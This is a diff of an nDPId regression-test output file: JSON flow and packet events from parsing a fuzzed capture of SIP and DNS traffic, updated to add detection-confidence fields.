+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":180000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470797172,"pkt":"ADBUADRWAODtAW69CABFAACBa6MAAIARSyVzAAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXB0Y3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":517,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1120470798172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470798172,"pkt":"ADBUABRUAODtAW69CABFAABIa6QAAIARS63AqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470798172,"flow_last_seen":1120470798172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470798172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1120470800175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470800175,"pkt":"ADBUADRWAODtAW69CABFAABIa6UAAIARS6zAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":520,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2167,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470802178,"pkt":"ADBUADRWAODtAW69CHdFAABIa6YAAIARS6vAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEXyVzAANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":520,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2167}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1120470806184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470806184,"pkt":"ADBUADRWAODtAW69CABFAABIa6cAAIARS6rAqAECwKgBAQruADUANPLDNxMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470717078,"flow_last_seen":1120470717080,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":424,"midstream":0,"ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470717078,"flow_last_seen":1120470717080,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":424,"midstream":0,"ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1120470814186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470814186,"pkt":"ADBUADRWAODtAW69CABFAABEa6gAAIARS63AqAECwKgBAQrvADXTMAi8HBQAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1120470814187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470814187,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKh3AgA1Cu8AR+s3HBSAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAUAAAJxAACwlsb2NhbGhvc3QA"}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470814187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 01352{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1120470814189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"ts_msec":1120470814189,"pkt":"ADBUADRWAODtAW69CABFAALDa6kAAIARFMHAqAEC1PIhIxPEE8QCr1LWUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjcxMTExNzUtNDMzMGM5ZDYxOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTlkYjMxNg0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz6GCkNhbGwtSUQ6IHI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwXzcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzRzM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDIgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpBdXRob3JpemF0aW9uOiBEaWdlc3QgdXNlcm5hbWU9InZvaTE4MDYyIixyZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsdXJpPSJzaXA6MTkyLjE2OC4xLjIiLG5vbmNlPSIxNzAxYjkzMzNlODcxMzJlN2Y3NDdjNTA3MjYzZDkzIixvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsbmM9IhIwMDAwMDAxIixyZXNwb25zZT0iMGRmOTZlYjUyOGJiNjMwYTE2ZmQwMjUyNjE4Y2YzY2IiDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQoNCg=="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1120470814334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470814334,"pkt":"ADBUADRWAODtAW69CABFAABIa6oAAIARS6fAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zxXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_s?p._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_s?p._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1120470814336,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"ts_msec":1120470814336,"pkt":"AODtAW69ADBUAFpWCABFAAFKAABAADcRiuPU8iEjwKgBAhPEE8QBNvufU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiAyOTg1ODE0Ny00NjViMDc1MkAyOTg1YjA1MS00NjViMDdiMg0KQ1NlcTogMiBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWdLMTlkYjMxNg0KVG86IDxzaXA6MzUxMDQ3MjNAc2lyLmN5YmVyY2l0eWtkaz4NClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7cmVjZWl2ZWQ9ODAuMjMwLm4xOS43MDtycG9ydD01MDYwO2JyYW5jaD16OWhHNGJLbnAyNzExMTE3NS00MzMwYzlkNjE5Mi4xNjguMS4yDQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1120470815395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470815395,"pkt":"ADBUADRWAODtAW69CABFAABIa6sAAIARS6bAqAECwKgBAQrwADUASDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470814334,"flow_last_seen":1120470815395,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470815395,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470814334,"flow_last_seen":1120470815395,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470815395,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1120470817390,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470817390,"pkt":"ADBUADRWAODtAW69CABFAABIa6wAAIARS6XAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1120470819393,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1120470819393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":17,"ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69CABFAAAlcwAAAIARS6TAqAECwKgBAQrwABUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3libXJjaXR5AmRrAAAhAAE="}
@@ -1195,160 +1197,160 @@
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":531,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1120470831400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470831400,"pkt":"ADBUADRWAODtAW69CABFAABEa7IAAIARS6PAqAECwKgBAQrxADUAMKq2ehcAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAQAwAAQ=="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1120470831402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470831402,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvEAR40yeheAAAABAAEAAAAAATEBMCVzADEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
